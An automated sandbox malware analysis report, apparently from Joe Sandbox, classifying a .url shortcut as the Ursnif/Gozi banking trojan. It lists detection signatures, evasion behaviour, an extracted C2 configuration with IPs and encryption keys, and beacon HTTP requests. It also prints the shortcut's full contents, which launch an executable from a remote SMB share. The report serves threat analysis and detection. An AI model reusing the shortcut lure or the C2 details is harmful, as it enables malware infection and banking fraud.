Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name: marzo.txt.url
Analysis ID: 826967
MD5: d8dc17b22192b297073d5749a7b49966
SHA1: 606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256: f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
Infos:

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found malicious URL file
Writes registry values via WMI
Opens network shares
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Creates a window with clipboard capturing capabilities
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_02BE1508

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MGNHOST-ASRU MGNHOST-ASRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.229.221.95 192.229.221.95
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/~
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr
Source: unknown DNS traffic detected: queries for: checklist.skype.com
Source: global traffic HTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Creates a window with clipboard capturing capabilities
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_02BE1508

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Found malicious URL file
Source: marzo.txt.url Initial sample: [InternetShortcut]IconIndex=70HotKey=0IDList=URL=file://46.8.19.120/Agenzia/server.exeIconFile=C:\Windows\system32\SHELL32.dll[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9
Writes registry values via WMI
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Yara signature match
Source: marzo.txt.url, type: SAMPLE Matched rule: Methodology_Suspicious_Shortcut_SMB_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects remote SMB path for .URL persistence, score = 27.09.2019, sample = e0bef7497fcb284edb0c65b59d511830, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Detected potential crypto function
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B816DF 3_2_02B816DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81D8A 3_2_02B81D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8832C 3_2_02B8832C
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE16DF 5_2_02BE16DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1D8A 5_2_02BE1D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE832C 5_2_02BE832C
Contains functionality to call native functions
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_02B8421F
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B88551 NtQueryVirtualMemory, 3_2_02B88551
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_02BE421F
Tries to load missing DLLs
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Section loaded: msvcr100.dll Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Section loaded: msvcr100.dll Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
Source: unknown Process created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback Jump to behavior
Source: classification engine Classification label: mal88.troj.spyw.evad.winURL@2/3@2/2
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B830D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_02B830D5
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Unpacked PE file: 3.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B87F30 push ecx; ret 3_2_02B87F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8831B push ecx; ret 3_2_02B8832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D54EDB push 8B8751D0h; retf 3_2_02D54EE0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D5A167 push edi; ret 3_2_02D5A168
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D4FC2D pushad ; ret 3_2_02D4FC81
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE7F30 push ecx; ret 5_2_02BE7F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE831B push ecx; ret 5_2_02BE832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C59883 push 8B8751D0h; retf 5_2_02C59888
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C545D5 pushad ; ret 5_2_02C54629
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C5EB0F push edi; ret 5_2_02C5EB10

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 75 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 313 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 268 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 36 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 40 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 472 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 47 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 97 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 39 > 30 Jump to behavior
